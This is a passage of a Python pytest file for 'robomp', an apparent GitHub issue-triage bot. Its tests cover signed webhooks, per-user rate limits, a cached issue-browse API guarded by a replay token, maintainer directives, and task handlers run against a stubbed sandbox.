test_trigger_rejects_bad_mode(env, monkeypatch: pytest.MonkeyPatch) -> None: + token = _enable_replay(monkeypatch) + cfg = Settings() # type: ignore[call-arg] + cfg.ensure_paths() + app = create_app(cfg) + with TestClient(app) as client: + resp = client.post( + "/api/trigger", + json={"mode": "explode"}, + headers={"X-Robomp-Replay-Token": token}, + ) + close_database() + assert resp.status_code == 400 + + +# -------- /webhook/github rate-limiting -------------------------------- + + +def _signed_headers(secret: str, body: bytes, *, event: str, delivery: str) -> dict[str, str]: + sig = hmac.new(secret.encode(), body, hashlib.sha256).hexdigest() + return { + "X-GitHub-Event": event, + "X-GitHub-Delivery": delivery, + "X-Hub-Signature-256": f"sha256={sig}", + "Content-Type": "application/json", + } + + +def _post_issue_opened( + client: TestClient, + *, + delivery: str, + user: str, + number: int, + association: str = "NONE", + secret: str = "test-webhook-secret", +): + payload = { + "action": "opened", + "issue": { + "number": number, + "user": {"login": user}, + "author_association": association, + }, + "repository": {"full_name": "octo/widget"}, + } + body = json.dumps(payload).encode() + return client.post( + "/webhook/github", + content=body, + headers=_signed_headers(secret, body, event="issues", delivery=delivery), + ) + + +def _post_pr_issue_comment( + client: TestClient, + *, + delivery: str, + user: str, + pr_number: int, + association: str = "NONE", + secret: str = "test-webhook-secret", +): + payload = { + "action": "created", + "comment": { + "user": {"login": user}, + "author_association": association, + "body": "follow-up", + }, + "issue": { + "number": pr_number, + "pull_request": {"url": f"https://api.github.com/repos/octo/widget/pulls/{pr_number}"}, + }, + "repository": {"full_name": "octo/widget"}, + } + body = json.dumps(payload).encode() + return client.post( + "/webhook/github", + content=body, + headers=_signed_headers(secret, body, event="issue_comment", delivery=delivery), + ) + + +@pytest.fixture +def rate_limited_settings(monkeypatch: pytest.MonkeyPatch, env: dict[str, str]) -> Settings: + monkeypatch.setenv("ROBOMP_RATE_LIMIT_DEFAULT", "2") + monkeypatch.setenv("ROBOMP_RATE_LIMIT_CONTRIBUTOR", "4") + monkeypatch.setenv("ROBOMP_RATE_LIMIT_WINDOW_SECONDS", "3600") + monkeypatch.setenv("ROBOMP_RATE_LIMIT_UNLIMITED", "can1357") + cfg = Settings() # type: ignore[call-arg] + cfg.ensure_paths() + return cfg + + +def test_webhook_rate_limits_unknown_submitter_at_default_cap(rate_limited_settings: Settings) -> None: + app = create_app(rate_limited_settings) + with TestClient(app) as client: + # Default cap is 2 → first two queued, third throttled. + states = [] + for i in range(3): + resp = _post_issue_opened( + client, + delivery=f"d-{i}", + user="stranger", + number=100 + i, + association="NONE", + ) + assert resp.status_code == 202 + states.append(resp.json()["state"]) + close_database() + assert states == ["queued", "queued", "skipped"] + + +def test_webhook_unmapped_pr_comment_queues_with_pr_key_and_counts_budget( + rate_limited_settings: Settings, +) -> None: + app = create_app(rate_limited_settings) + with TestClient(app) as client: + queued = _post_pr_issue_comment( + client, + delivery="pr-unmapped", + user="stranger", + pr_number=900, + association="NONE", + ) + assert queued.status_code == 202 + assert queued.json()["state"] == "queued" + + states = [] + for i in range(3): + resp = _post_issue_opened( + client, + delivery=f"real-{i}", + user="stranger", + number=100 + i, + association="NONE", + ) + assert resp.status_code == 202 + states.append(resp.json()["state"]) + + db = get_database(rate_limited_settings.sqlite_path) + unmapped = db.get_event("pr-unmapped") + close_database() + + assert unmapped is not None + assert unmapped.issue_key == "octo/widget#900" + assert unmapped.last_error is None + assert states == ["queued", "skipped", "skipped"] + + +def test_webhook_contributor_gets_higher_cap(rate_limited_settings: Settings) -> None: + app = create_app(rate_limited_settings) + with TestClient(app) as client: + # Default cap (2) would block at i=2; CONTRIBUTOR cap (4) allows it. + for i in range(4): + resp = _post_issue_opened( + client, + delivery=f"c-{i}", + user="bob", + number=200 + i, + association="CONTRIBUTOR", + ) + assert resp.status_code == 202 + assert resp.json()["state"] == "queued", i + resp = _post_issue_opened( + client, + delivery="c-x", + user="bob", + number=299, + association="CONTRIBUTOR", + ) + assert resp.json()["state"] == "skipped" + close_database() + + +def test_webhook_owner_association_bypasses_limit(rate_limited_settings: Settings) -> None: + app = create_app(rate_limited_settings) + with TestClient(app) as client: + for i in range(5): # well over default cap + resp = _post_issue_opened( + client, + delivery=f"o-{i}", + user="acme-staff", + number=300 + i, + association="OWNER", + ) + assert resp.json()["state"] == "queued", i + close_database() + + +def test_webhook_unlimited_allowlist_bypasses_limit(rate_limited_settings: Settings) -> None: + app = create_app(rate_limited_settings) + with TestClient(app) as client: + # NONE association would normally cap at 2, but `can1357` is whitelisted. + for i in range(5): + resp = _post_issue_opened( + client, + delivery=f"u-{i}", + user="can1357", + number=400 + i, + association="NONE", + ) + assert resp.json()["state"] == "queued", i + close_database() + + +def test_webhook_rate_limit_per_user_is_independent(rate_limited_settings: Settings) -> None: + """One user's cap doesn't drain another user's budget.""" + app = create_app(rate_limited_settings) + with TestClient(app) as client: + # alice exhausts default cap. + for i in range(2): + assert ( + _post_issue_opened( + client, + delivery=f"a-{i}", + user="alice", + number=500 + i, + association="NONE", + ).json()["state"] + == "queued" + ) + # alice's next attempt is skipped. + assert ( + _post_issue_opened( + client, + delivery="a-x", + user="alice", + number=599, + association="NONE", + ).json()["state"] + == "skipped" + ) + # bob is untouched. + for i in range(2): + assert ( + _post_issue_opened( + client, + delivery=f"b-{i}", + user="bob", + number=600 + i, + association="NONE", + ).json()["state"] + == "queued" + ) + close_database() + + +def test_webhook_rate_limited_event_records_reason(rate_limited_settings: Settings) -> None: + """Throttled events must surface a useful reason on the dashboard feed.""" + app = create_app(rate_limited_settings) + with TestClient(app) as client: + for i in range(3): + _post_issue_opened( + client, + delivery=f"r-{i}", + user="charlie", + number=700 + i, + association="NONE", + ) + db = get_database(rate_limited_settings.sqlite_path) + skipped = db.get_event("r-2") + close_database() + assert skipped is not None + assert skipped.state == "skipped" + assert skipped.last_error is not None + assert "rate limit" in skipped.last_error + assert "@charlie" in skipped.last_error + + +# ---------- /api/github/issues ---------- + + +def _allowlist(monkeypatch: pytest.MonkeyPatch, repos: str) -> None: + monkeypatch.setenv("ROBOMP_REPO_ALLOWLIST", repos) + reset_settings_cache() + + +def _issue_payload( + number: int, + title: str, + *, + state: str = "open", + author: str = "alice", + labels: list[dict] | None = None, + comments: int = 0, + updated_at: str = "2026-05-14T10:00:00Z", + created_at: str = "2026-05-01T10:00:00Z", + repo: str = "octo/widget", +) -> dict: + return { + "number": number, + "title": title, + "state": state, + "user": {"login": author}, + "labels": labels or [], + "comments": comments, + "updated_at": updated_at, + "created_at": created_at, + "html_url": f"https://github.com/{repo}/issues/{number}", + } + + +def _make_issues_handler( + by_repo: dict[str, list[dict]], + *, + expected_state: str = "open", + expected_limit: int = 30, + failing_repos: tuple[str, ...] = (), +) -> httpx.MockTransport: + expected_params = { + "state": expected_state, + "per_page": str(expected_limit), + "sort": "updated", + "direction": "desc", + } + + def handler(request: httpx.Request) -> httpx.Response: + assert request.method == "GET" + params = request.url.params + assert set(params.keys()) == set(expected_params) + for key, expected in expected_params.items(): + assert params.get(key) == expected + + path = request.url.path + for repo, items in by_repo.items(): + if path == f"/repos/{repo}/issues": + return httpx.Response(200, json=items) + for repo in failing_repos: + if path == f"/repos/{repo}/issues": + return httpx.Response(500, json={"message": "boom"}) + return httpx.Response(404, json={"message": "not found"}) + + return httpx.MockTransport(handler) + + +def test_browse_returns_404_without_token(settings: Settings) -> None: + app = create_app(settings) + with TestClient(app) as client: + resp = client.get("/api/github/issues") + close_database() + assert resp.status_code == 404 + + +def test_browse_returns_401_with_replay_enabled_without_valid_token(env, monkeypatch: pytest.MonkeyPatch) -> None: + token = _enable_replay(monkeypatch) + cfg = Settings() # type: ignore[call-arg] + cfg.ensure_paths() + app = create_app(cfg) + + with TestClient(app) as client: + missing = client.get("/api/github/issues") + wrong = client.get( + "/api/github/issues", + headers={"X-Robomp-Replay-Token": f"{token}-wrong"}, + ) + close_database() + + assert missing.status_code == 401 + assert wrong.status_code == 401 + + +def test_browse_fans_out_across_allowlist_and_filters_prs(env, monkeypatch: pytest.MonkeyPatch) -> None: + token = _enable_replay(monkeypatch) + _allowlist(monkeypatch, "octo/widget,octo/gadget") + cfg = Settings() # type: ignore[call-arg] + cfg.ensure_paths() + transport = _make_issues_handler( + { + "octo/widget": [ + { + "number": 7, + "title": "newest", + "state": "open", + "user": {"login": "alice"}, + "labels": [{"name": "bug"}], + "comments": 3, + "updated_at": "2026-05-14T10:00:00Z", + "created_at": "2026-05-01T10:00:00Z", + "html_url": "https://github.com/octo/widget/issues/7", + }, + { + "number": 8, + "title": "a PR not an issue", + "state": "open", + "user": {"login": "bob"}, + "labels": [], + "comments": 0, + "updated_at": "2026-05-14T11:00:00Z", + "created_at": "2026-05-14T11:00:00Z", + "html_url": "https://github.com/octo/widget/pull/8", + "pull_request": {"url": "..."}, + }, # GitHub /issues returns these too + ], + "octo/gadget": [ + { + "number": 2, + "title": "older", + "state": "open", + "user": {"login": "carol"}, + "labels": [], + "comments": 1, + "updated_at": "2026-05-12T09:00:00Z", + "created_at": "2026-05-12T09:00:00Z", + "html_url": "https://github.com/octo/gadget/issues/2", + }, + ], + }, + expected_limit=20, + ) + app = create_app(cfg) + with TestClient(app) as client: + _install_github_mock(app, transport) + resp = client.get( + "/api/github/issues?state=open&limit=20", + headers={"X-Robomp-Replay-Token": token}, + ) + close_database() + + assert resp.status_code == 200, resp.text + body = resp.json() + assert body["repos"] == ["octo/gadget", "octo/widget"] + assert body["errors"] == [] + # PR row dropped; issues sorted newest-updated first. + titles = [(i["repo"], i["number"]) for i in body["issues"]] + assert titles == [("octo/widget", 7), ("octo/gadget", 2)] + first = body["issues"][0] + assert first["author"] == "alice" + assert first["labels"] == ["bug"] + assert first["comments"] == 3 + assert first["html_url"].endswith("/issues/7") + + +def test_browse_reuses_cache_until_forced_refresh(env, monkeypatch: pytest.MonkeyPatch) -> None: + token = _enable_replay(monkeypatch) + cfg = Settings() # type: ignore[call-arg] + cfg.ensure_paths() + calls = 0 + + def handler(request: httpx.Request) -> httpx.Response: + nonlocal calls + assert request.method == "GET" + assert request.url.path == "/repos/octo/widget/issues" + calls += 1 + title = "initial" if calls == 1 else "refreshed" + updated_at = "2026-05-14T10:00:00Z" if calls == 1 else "2026-05-14T11:00:00Z" + return httpx.Response(200, json=[_issue_payload(1, title, updated_at=updated_at)]) + + app = create_app(cfg) + with TestClient(app) as client: + _install_github_mock(app, httpx.MockTransport(handler)) + first = client.get( + "/api/github/issues?state=open&limit=20", + headers={"X-Robomp-Replay-Token": token}, + ) + second = client.get( + "/api/github/issues?state=open&limit=20", + headers={"X-Robomp-Replay-Token": token}, + ) + forced = client.get( + "/api/github/issues?state=open&limit=20&refresh=1", + headers={"X-Robomp-Replay-Token": token}, + ) + close_database() + + assert first.status_code == 200 + assert second.status_code == 200 + assert forced.status_code == 200 + assert calls == 2 + assert first.json()["cache"]["hit"] is False + assert first.json()["issues"][0]["title"] == "initial" + assert second.json()["cache"]["hit"] is True + assert second.json()["issues"][0]["title"] == "initial" + assert forced.json()["cache"]["hit"] is False + assert forced.json()["issues"][0]["title"] == "refreshed" + + +def test_browse_cache_updates_from_issue_webhook(env, monkeypatch: pytest.MonkeyPatch) -> None: + token = _enable_replay(monkeypatch) + cfg = Settings() # type: ignore[call-arg] + cfg.ensure_paths() + calls = 0 + + def handler(request: httpx.Request) -> httpx.Response: + nonlocal calls + assert request.url.path == "/repos/octo/widget/issues" + calls += 1 + return httpx.Response(200, json=[_issue_payload(4, "before", comments=1)]) + + app = create_app(cfg) + with TestClient(app) as client: + _install_github_mock(app, httpx.MockTransport(handler)) + first = client.get( + "/api/github/issues?state=open&limit=20", + headers={"X-Robomp-Replay-Token": token}, + ) + assert first.status_code == 200 + + edited = { + "action": "edited", + "issue": _issue_payload( + 4, + "after", + labels=[{"name": "bug"}], + comments=3, + updated_at="2026-05-14T12:00:00Z", + ), + "repository": {"full_name": "octo/widget"}, + } + raw = json.dumps(edited).encode() + webhook_resp = client.post( + "/webhook/github", + content=raw, + headers=_signed_headers("test-webhook-secret", raw, event="issues", delivery="cache-edit"), + ) + after = client.get( + "/api/github/issues?state=open&limit=20", + headers={"X-Robomp-Replay-Token": token}, + ) + close_database() + + assert webhook_resp.status_code == 202 + assert calls == 1 + body = after.json() + assert body["cache"]["hit"] is True + assert body["issues"][0]["title"] == "after" + assert body["issues"][0]["comments"] == 3 + assert body["issues"][0]["labels"] == ["bug"] + + +def test_browse_per_repo_failure_does_not_take_down_panel(env, monkeypatch: pytest.MonkeyPatch) -> None: + token = _enable_replay(monkeypatch) + _allowlist(monkeypatch, "octo/widget,octo/dead") + cfg = Settings() # type: ignore[call-arg] + cfg.ensure_paths() + + transport = _make_issues_handler( + { + "octo/widget": [ + { + "number": 1, + "title": "ok", + "state": "open", + "user": {"login": "u"}, + "labels": [], + "comments": 0, + "updated_at": "2026-05-14T00:00:00Z", + "created_at": "2026-05-14T00:00:00Z", + "html_url": "https://github.com/octo/widget/issues/1", + }, + ], + }, + failing_repos=("octo/dead",), + ) + + app = create_app(cfg) + with TestClient(app) as client: + _install_github_mock(app, transport) + resp = client.get( + "/api/github/issues", + headers={"X-Robomp-Replay-Token": token}, + ) + close_database() + + assert resp.status_code == 200 + body = resp.json() + assert len(body["issues"]) == 1 + assert body["issues"][0]["repo"] == "octo/widget" + assert len(body["errors"]) == 1 + assert body["errors"][0]["repo"] == "octo/dead" + + +def test_browse_rejects_bad_state(env, monkeypatch: pytest.MonkeyPatch) -> None: + token = _enable_replay(monkeypatch) + cfg = Settings() # type: ignore[call-arg] + cfg.ensure_paths() + app = create_app(cfg) + with TestClient(app) as client: + _install_github_mock(app, httpx.MockTransport(lambda r: httpx.Response(500))) + resp = client.get( + "/api/github/issues?state=garbage", + headers={"X-Robomp-Replay-Token": token}, + ) + close_database() + assert resp.status_code == 400 + + +def test_browse_marks_processed_issues_present_in_db(env, monkeypatch: pytest.MonkeyPatch) -> None: + """The /api/github/issues payload tags every issue with `processed`, + derived live from the `issues` table so freshly-triaged work disappears + from the "fresh issues" filter without invalidating the GitHub cache.""" + token = _enable_replay(monkeypatch) + cfg = Settings() # type: ignore[call-arg] + cfg.ensure_paths() + + # Seed: issue #7 was previously picked up; #8 is brand new. + db = get_database(cfg.sqlite_path) + db.upsert_issue( + key=issue_key("octo/widget", 7), + repo="octo/widget", + number=7, + state="opened", + ) + + transport = _make_issues_handler( + { + "octo/widget": [ + _issue_payload(7, "already triaged", updated_at="2026-05-14T10:00:00Z"), + _issue_payload(8, "fresh", updated_at="2026-05-14T11:00:00Z"), + ], + }, + expected_limit=20, + ) + app = create_app(cfg) + with TestClient(app) as client: + _install_github_mock(app, transport) + resp = client.get( + "/api/github/issues?state=open&limit=20", + headers={"X-Robomp-Replay-Token": token}, + ) + close_database() + + assert resp.status_code == 200, resp.text + by_number = {i["number"]: i for i in resp.json()["issues"]} + assert by_number[7]["processed"] is True + assert by_number[8]["processed"] is False + + +def test_browse_processed_flag_is_recomputed_on_cache_hit(env, monkeypatch: pytest.MonkeyPatch) -> None: + """Even when the GitHub cache is reused, `processed` reflects the current DB + so a triage that lands between two dashboard polls hides the entry on the + next refresh without forcing a GitHub round-trip.""" + token = _enable_replay(monkeypatch) + cfg = Settings() # type: ignore[call-arg] + cfg.ensure_paths() + + calls = 0 + + def handler(request: httpx.Request) -> httpx.Response: + nonlocal calls + calls += 1 + return httpx.Response(200, json=[_issue_payload(9, "fresh")]) + + app = create_app(cfg) + with TestClient(app) as client: + _install_github_mock(app, httpx.MockTransport(handler)) + first = client.get( + "/api/github/issues?state=open&limit=20", + headers={"X-Robomp-Replay-Token": token}, + ) + assert first.status_code == 200 + assert first.json()["issues"][0]["processed"] is False + + # Simulate a triage landing between two dashboard polls. + get_database(cfg.sqlite_path).upsert_issue( + key=issue_key("octo/widget", 9), + repo="octo/widget", + number=9, + state="reproducing", + ) + + second = client.get( + "/api/github/issues?state=open&limit=20", + headers={"X-Robomp-Replay-Token": token}, + ) + close_database() + + # GitHub was hit only once; the cached entry served the second call. + assert calls == 1 + body = second.json() + assert body["cache"]["hit"] is True + assert body["issues"][0]["processed"] is True + + +# -------- maintainer directives ---------------------------------------- + + +def _post_issue_comment( + client: TestClient, + *, + delivery: str, + user: str, + number: int, + body: str, + association: str = "NONE", + secret: str = "test-webhook-secret", +): + payload = { + "action": "created", + "comment": { + "user": {"login": user}, + "author_association": association, + "body": body, + }, + "issue": {"number": number}, + "repository": {"full_name": "octo/widget"}, + } + raw = json.dumps(payload).encode() + return client.post( + "/webhook/github", + content=raw, + headers=_signed_headers(secret, raw, event="issue_comment", delivery=delivery), + ) + + +def test_webhook_directive_on_unknown_issue_is_queued_with_metadata(env) -> None: + cfg = Settings() # type: ignore[call-arg] + cfg.ensure_paths() + app = create_app(cfg) + with TestClient(app) as client: + resp = _post_issue_comment( + client, + delivery="dir-1", + user="can1357", + number=77, + body="@robomp-bot please refactor X", + association="OWNER", + ) + assert resp.status_code == 202 + assert resp.json()["state"] == "queued" + row = get_database(cfg.sqlite_path).get_event("dir-1") + close_database() + assert row is not None + assert row.state == "queued" + directive = row.payload.get("_robomp_directive") + assert directive == {"body": "please refactor X", "author": "can1357", "pragmas": []} + + +def test_webhook_maintainer_bypasses_rate_limit( + rate_limited_settings: Settings, + monkeypatch: pytest.MonkeyPatch, +) -> None: + """Login in ROBOMP_MAINTAINER_LOGINS is always unlimited, even with NONE association.""" + monkeypatch.setenv("ROBOMP_MAINTAINER_LOGINS", "can1357") + reset_settings_cache() + cfg = Settings() # type: ignore[call-arg] + cfg.ensure_paths() + + app = create_app(cfg) + with TestClient(app) as client: + states = [] + # cap=2 from rate_limited_settings — 3rd would normally be skipped. + for i in range(4): + resp = _post_issue_comment( + client, + delivery=f"m-{i}", + user="can1357", + number=300 + i, + body=("@robomp-bot do X" if i == 3 else "comment"), + association="NONE", + ) + assert resp.status_code == 202 + states.append(resp.json()["state"]) + close_database() + assert states == ["queued"] * 4, states + + +# -------- handler-level: bootstrap + reopen ---------------------------- + + +class _RecordingSandbox: + """Stand-in for SandboxManager: records calls, hands back a fake Workspace.""" + + natives_cache = None + + def __init__(self, tmp_root: Path) -> None: + self.tmp_root = tmp_root + self.ensure_calls: list[dict] = [] + self.remove_calls: list[tuple[str, int]] = [] + + def ensure_workspace( + self, + *, + repo: str, + number: int, + title: str, + clone_url: str, + default_branch: str, + existing_branch=None, + author_name: str = "", + author_email: str = "", + slot_uid: int | None = None, + ): + self.ensure_calls.append( + { + "repo": repo, + "number": number, + "title": title, + "default_branch": default_branch, + "existing_branch": existing_branch, + "slot_uid": slot_uid, + } + ) + # Mimic Workspace shape — only the attributes ensure_workspace's + # downstream callers touch. + from dataclasses import dataclass + + @dataclass(slots=True, frozen=True) + class _W: + branch: str + session_dir: Path + context_dir: Path + repo_dir: Path + + wid = f"{repo.replace('/', '__')}__{number}" + return _W( + branch=existing_branch or f"farm/auto/{wid}", + session_dir=self.tmp_root / wid / "session", + context_dir=self.tmp_root / wid / "context", + repo_dir=self.tmp_root / wid / "repo", + ) + + def remove_workspace(self, *, repo: str, number: int) -> None: + self.remove_calls.append((repo, number)) + + +@pytest.fixture +def stub_run_task(monkeypatch: pytest.MonkeyPatch) -> list[dict]: + """Capture run_task invocations instead of spinning up RpcClient.""" + captured: list[dict] = [] + + async def _stub(**kwargs): + captured.append(kwargs) + return None + + from robomp import tasks as tasks_module + + monkeypatch.setattr(tasks_module, "run_task", _stub) + return captured + + +async def test_handle_pr_conversation_unmapped_bot_pr_uses_pr_branch( + settings: Settings, tmp_path: Path, stub_run_task, monkeypatch +) -> None: + from robomp import tasks + from robomp.github_client import IssueInfo, PullRequestInfo, RepoInfo + + sandbox = _RecordingSandbox(tmp_path) + db = get_database(settings.sqlite_path) + repo = RepoInfo( + full_name="octo/widget", default_branch="main", clone_url="https://github.com/octo/widget.git", private=False + ) + pr_issue = IssueInfo( + repo="octo/widget", + number=900, + title="Fix flaky parser", + body="PR body", + state="open", + author=settings.bot_login, + labels=(), + is_pull_request=True, + ) + pr_info = PullRequestInfo( + repo="octo/widget", + number=900, + html_url="https://github.com/octo/widget/pull/900", + head_ref="farm/abc12345/fix-flaky-parser", + base_ref="main", + state="open", + author=settings.bot_login, + head_repo="octo/widget", + ) + + async def _get_pull_request(self, repo_full: str, number: int): + assert repo_full == "octo/widget" + assert number == 900 + return pr_info + + async def _get_repo(self, repo_full: str): + assert repo_full == "octo/widget" + return repo + + async def _get_issue(self, repo_full: str, number: int): + assert repo_full == "octo/widget" + assert number == 900 + return pr_issue + + monkeypatch.setattr(GitHubClient, "get_pull_request", _get_pull_request) + monkeypatch.setattr(GitHubClient, "get_repo", _get_repo) + monkeypatch.setattr(GitHubClient, "get_issue", _get_issue) + + payload = { + "action": "created", + "issue": {"number": 900, "pull_request": {"url": "https://api.github.com/repos/octo/widget/pulls/900"}}, + "comment": {"user": {"login": "can1357"}, "body": "please fix", "id": 10, "created_at": "2026-05-15T00:00:00Z"}, + "repository": {"full_name": "octo/widget"}, + } + await tasks.handle_pr_conversation( + settings=settings, + db=db, + github=GitHubClient("t"), + git_transport=LocalGitTransport(token=None), + sandbox=sandbox, + payload=payload, + delivery_id="test-pr-direct", + ) + + assert len(stub_run_task) == 1 + call = stub_run_task[0] + assert call["task_kind"] == "handle_comment" + assert call["pr_number"] == 900 + assert call["inputs"].issue.is_pull_request is True + assert sandbox.ensure_calls[0]["number"] == 900 + assert sandbox.ensure_calls[0]["existing_branch"] == "farm/abc12345/fix-flaky-parser" + row = db.get_issue("octo/widget#900") + assert row is not None + assert row.pr_number == 900 + assert row.branch == "farm/abc12345/fix-flaky-parser" + close_database() + + +async def test_handle_pr_conversation_repairs_missing_pr_mapping_from_branch( + settings: Settings, tmp_path: Path, stub_run_task, monkeypatch +) -> None: + from robomp import tasks + from robomp.github_client import IssueInfo, PullRequestInfo, RepoInfo + + sandbox = _RecordingSandbox(tmp_path) + db = get_database(settings.sqlite_path) + branch = "farm/abc12345/fix-flaky-parser" + db.upsert_issue(key="octo/widget#42", repo="octo/widget", number=42, state="opened", branch=branch) + repo = RepoInfo( + full_name="octo/widget", default_branch="main", clone_url="https://github.com/octo/widget.git", private=False + ) + issue = IssueInfo( + repo="octo/widget", + number=42, + title="Parser is flaky", + body="issue body", + state="open", + author="alice", + labels=(), + is_pull_request=False, + ) + pr_info = PullRequestInfo( + repo="octo/widget", + number=900, + html_url="https://github.com/octo/widget/pull/900", + head_ref=branch, + base_ref="main", + state="open", + author=settings.bot_login, + head_repo="octo/widget", + ) + + async def _get_pull_request(self, repo_full: str, number: int): + assert repo_full == "octo/widget" + assert number == 900 + return pr_info + + async def _get_repo(self, repo_full: str): + assert repo_full == "octo/widget" + return repo + + async def _get_issue(self, repo_full: str, number: int): + assert repo_full == "octo/widget" + assert number == 42 + return issue + + monkeypatch.setattr(GitHubClient, "get_pull_request", _get_pull_request) + monkeypatch.setattr(GitHubClient, "get_repo", _get_repo) + monkeypatch.setattr(GitHubClient, "get_issue", _get_issue) + + payload = { + "action": "created", + "issue": {"number": 900, "pull_request": {"url": "https://api.github.com/repos/octo/widget/pulls/900"}}, + "comment": {"user": {"login": "can1357"}, "body": "please fix", "id": 11, "created_at": "2026-05-15T00:00:00Z"}, + "repository": {"full_name": "octo/widget"}, + } + await tasks.handle_pr_conversation( + settings=settings, + db=db, + github=GitHubClient("t"), + git_transport=LocalGitTransport(token=None), + sandbox=sandbox, + payload=payload, + delivery_id="test-pr-repair", + ) + + assert len(stub_run_task) == 1 + call = stub_run_task[0] + assert call["inputs"].issue.number == 42 + assert call["pr_number"] == 900 + assert sandbox.ensure_calls[0]["number"] == 42 + assert sandbox.ensure_calls[0]["existing_branch"] == branch + row = db.get_issue("octo/widget#42") + assert row is not None + assert row.pr_number == 900 + close_database() + + +async def test_handle_comment_directive_bootstraps_untriaged_issue( + settings: Settings, tmp_path: Path, stub_run_task, monkeypatch +) -> None: + """Directive on an unknown issue → DB row created, triage_issue task with directive.""" + from robomp import tasks + from robomp.github_client import GitHubClient, IssueInfo, RepoInfo + + sandbox = _RecordingSandbox(tmp_path) + db = get_database(settings.sqlite_path) + repo = RepoInfo( + full_name="octo/widget", default_branch="main", clone_url="https://github.com/octo/widget.git", private=False + ) + issue = IssueInfo( + repo="octo/widget", + number=88, + title="boom", + body="details", + state="open", + author="alice", + labels=(), + is_pull_request=False, + ) + + async def _resolve(_gh, _payload): + return repo, issue + + monkeypatch.setattr(tasks, "_resolve_repo_and_issue", _resolve) + + payload = { + "action": "created", + "issue": {"number": 88, "user": {"login": "alice"}, "title": "boom"}, + "comment": {"user": {"login": "can1357"}, "body": "do it", "id": 1, "created_at": "2026-05-14T20:00:00Z"}, + "repository": {"full_name": "octo/widget"}, + "_robomp_directive": {"body": "please refactor X", "author": "can1357"}, + } + await tasks.handle_comment( + settings=settings, + db=db, + github=GitHubClient("t"), + git_transport=LocalGitTransport(token=None), + sandbox=sandbox, + payload=payload, + delivery_id="test-delivery-1", + ) + assert len(stub_run_task) == 1 + call = stub_run_task[0] + assert call["task_kind"] == "triage_issue" + assert call["directive"] is not None + assert call["directive"].body == "please refactor X" + assert call["directive"].author == "can1357" + row = db.get_issue("octo/widget#88") + assert row is not None + assert row.state == "reproducing" + assert sandbox.ensure_calls, "ensure_workspace must be called" + assert sandbox.remove_calls == [], "no removal on bootstrap" + close_database() + + +async def test_handle_comment_directive_reopens_finalized_issue( + settings: Settings, tmp_path: Path, stub_run_task, monkeypatch +) -> None: + """Directive on a closed issue → workspace torn down, state reset, no auto-reply.""" + from robomp import tasks + from robomp.github_client import GitHubClient, IssueInfo, RepoInfo + + sandbox = _RecordingSandbox(tmp_path) + db = get_database(settings.sqlite_path) + db.upsert_issue( + key="octo/widget#88", repo="octo/widget", number=88, state="closed", branch="farm/old/branch", pr_number=99 + ) + + repo = RepoInfo( + full_name="octo/widget", default_branch="main", clone_url="https://github.com/octo/widget.git", private=False + ) + issue = IssueInfo( + repo="octo/widget", + number=88, + title="boom", + body="details", + state="open", + author="alice", + labels=(), + is_pull_request=False, + ) + + async def _resolve(_gh, _payload): + return repo, issue + + monkeypatch.setattr(tasks, "_resolve_repo_and_issue", _resolve) + + post_comment_calls: list = [] + + async def _no_post_comment(*args, **kwargs): + post_comment_calls.append((args, kwargs)) + return None + + monkeypatch.setattr(GitHubClient, "post_comment", _no_post_comment) + + payload = { + "action": "created", + "issue": {"number": 88, "user": {"login": "alice"}, "title": "boom"}, + "comment": {"user": {"login": "can1357"}, "body": "redo", "id": 2, "created_at": "2026-05-14T21:00:00Z"}, + "repository": {"full_name": "octo/widget"}, + "_robomp_directive": {"body": "redo the fix", "author": "can1357"}, + } + await tasks.handle_comment( + settings=settings, + db=db, + github=GitHubClient("t"), + git_transport=LocalGitTransport(token=None), + sandbox=sandbox, + payload=payload, + delivery_id="test-delivery-2", + ) + assert len(stub_run_task) == 1 + call = stub_run_task[0] + assert call["task_kind"] == "handle_comment" + assert call["directive"].body == "redo the fix" + assert sandbox.remove_calls == [("octo/widget", 88)] + assert sandbox.ensure_calls + # Reopen branches afresh (no existing_branch passed). + assert sandbox.ensure_calls[0]["existing_branch"] is None + assert post_comment_calls == [], "no 'this is closed' comment on reopen" + row = db.get_issue("octo/widget#88") + assert row is not None and row.state == "reproducing" + close_database() + + +async def test_handle_comment_finalized_without_directive_still_replies( + settings: Settings, tmp_path: Path, stub_run_task, monkeypatch +) -> None: + """Non-maintainer on a closed issue → original behavior preserved.""" + from robomp import tasks + from robomp.github_client import GitHubClient, IssueInfo, RepoInfo + + sandbox = _RecordingSandbox(tmp_path) + db = get_database(settings.sqlite_path) + db.upsert_issue( + key="octo/widget#88", repo="octo/widget", number=88, state="closed", branch="farm/old/branch", pr_number=99 + ) + + repo = RepoInfo( + full_name="octo/widget", default_branch="main", clone_url="https://github.com/octo/widget.git", private=False + ) + issue = IssueInfo( + repo="octo/widget", + number=88, + title="boom", + body="details", + state="closed", + author="alice", + labels=(), + is_pull_request=False, + ) + + async def _resolve(_gh, _payload): + return repo, issue + + monkeypatch.setattr(tasks, "_resolve_repo_and_issue", _resolve) + + post_comment_calls: list = [] + + async def _capture_post(self, *args, **kwargs): + post_comment_calls.append((args, kwargs)) + return None + + monkeypatch.setattr(GitHubClient, "post_comment", _capture_post) + + payload = { + "action": "created", + "issue": {"number": 88, "user": {"login": "stranger"}, "title": "boom"}, + "comment": { + "user": {"login": "stranger"}, + "body": "still broken", + "id": 3, + "created_at": "2026-05-14T22:00:00Z", + }, + "repository": {"full_name": "octo/widget"}, + } + await tasks.handle_comment( + settings=settings, + db=db, + github=GitHubClient("t"), + git_transport=LocalGitTransport(token=None), + sandbox=sandbox, + payload=payload, + delivery_id="test-delivery-3", + ) + assert stub_run_task == [], "must not invoke run_task on plain finalized comment" + assert post_comment_calls, "should post the finalized-issue reply" + assert sandbox.remove_calls == [] + close_database() + + +async def test_directive_handler_attaches_thread_from_github( + settings: Settings, tmp_path: Path, stub_run_task, monkeypatch +) -> None: + """When a directive lands, the handler must hydrate the thread before run_task.""" + from robomp import tasks + from robomp.github_client import ( + CommentInfo, + GitHubClient, + IssueInfo, + RepoInfo, + ) + + sandbox = _RecordingSandbox(tmp_path) + db = get_database(settings.sqlite_path) + + repo = RepoInfo( + full_name="octo/widget", default_branch="main", clone_url="https://github.com/octo/widget.git", private=False + ) + issue = IssueInfo( + repo="octo/widget", + number=88, + title="boom", + body="the body", + state="open", + author="alice", + labels=(), + is_pull_request=False, + ) + + async def _resolve(_gh, _payload): + return repo, issue + + monkeypatch.setattr(tasks, "_resolve_repo_and_issue", _resolve) + + # Stub GitHubClient endpoints used by _fetch_thread. + async def _get_issue(self, _repo, _number): + return issue + + async def _list_comments(self, _repo, 